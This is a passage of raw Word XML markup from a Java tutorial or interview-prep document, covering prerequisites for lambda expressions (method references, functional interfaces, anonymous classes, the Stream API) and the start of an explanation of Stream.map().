        <w:t>first-class functions</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higher-order function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pure functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are foundational to lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECF553" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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Understanding of Method References (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C5E52" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a shorthand for lambda expressions that directly refer to methods. While not strictly required, method references are often used in conjunction with lambda expressions to make code more concise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0B6294" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>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String&gt; names = Arrays.asList("John", "Alice", "Bob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1AC19" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="72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ames.forEach(System.out::println);  // Method reference instead of lambda expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3F6F4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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Use of Java's Standard Library Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5A723" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Lambda expressions work extensively with Java's </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream API</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Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It’s helpful to be familiar with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49C1E9" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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reams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For operations like map, filter, and reduce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA0B31A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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unctional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Common functional interfaces in java.util.function package, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203D3C6" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9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nction&lt;T, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E018EA" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9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edicate&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B289583" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9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sumer&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC8786" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9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pplier&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E7FDB7" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9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iFunction&lt;T, U, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD2DC0" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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Strong Understanding of Anonymous Classes (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0D12D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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efore Java 8, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>anonymous classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> were commonly used to implement interfaces or extend classes. Understanding how anonymous classes work can help you see the improvements in readability and conciseness that lambda expressions bring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF58E8E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70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of an anonymous class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596AA3F1" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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String&gt; names = Arrays.asList("John", "Alice", "Bob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2043E4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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ames.forEach(new Consumer&lt;String&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD97EE2" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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accept(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E58415" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31090D9E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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35C4722" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">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621A9EF" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70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ambda expression simplifies the above code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148113B6" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70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ames.forEach(name -&gt; System.out.println(name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DDF772" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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7. Understanding of Functional Programming in Java (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AB171" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a style of programming that treats computation as the evaluation of mathematical functions and avoids changing-state and mutable data. Knowing concepts like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutability</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pure functions</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higher-order function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lazy evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will help you to effectively use lambda expressions and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242644DF" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001A70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86B022E">
          <v:rect id="_x0000_i1686" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CEC8F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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 of Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C2A14" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ava 8 or higher</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77670C1E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (interfaces with one abstract method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4748C658" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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nderstanding of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE0A17" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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reams API</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standard library functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005F251" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Familiarity with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2DDEB9" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ptional) Understanding </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>anonymous classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC63C1E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70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Once these prerequisites are met, you can start using lambda expressions to write more concise, flexible, and readable code in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2514AE" w14:textId="3A95A16B" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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11FC357">
          <v:rect id="_x0000_i1687" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40760A57" w14:textId="77777777" w:rsidR="00520371" w:rsidRPr="00CE4B95" w:rsidRDefault="00520371">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="_Toc196307700"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the map function in stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w14:paraId="3BABC654" w14:textId="7AE93A14" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">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map()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transformation operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>apply a function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to each element in the stream, producing a new stream of transformed elements. It is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each element of the stream to another object or value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E45E5B"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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F049ABC"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eam&lt;R&gt; map(Function&lt;? super T, ? extends R&gt; mapper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB0D154" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The type of the elements in the original stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B2B61" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The type of the elements in the new stream after the transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BF3FE" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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apper</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that defines how each element should be transformed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC2340"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map() function </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not modify the original stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but returns a new stream with the transformed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47112F22"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7949FFDE" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the elements of the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9E3A8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
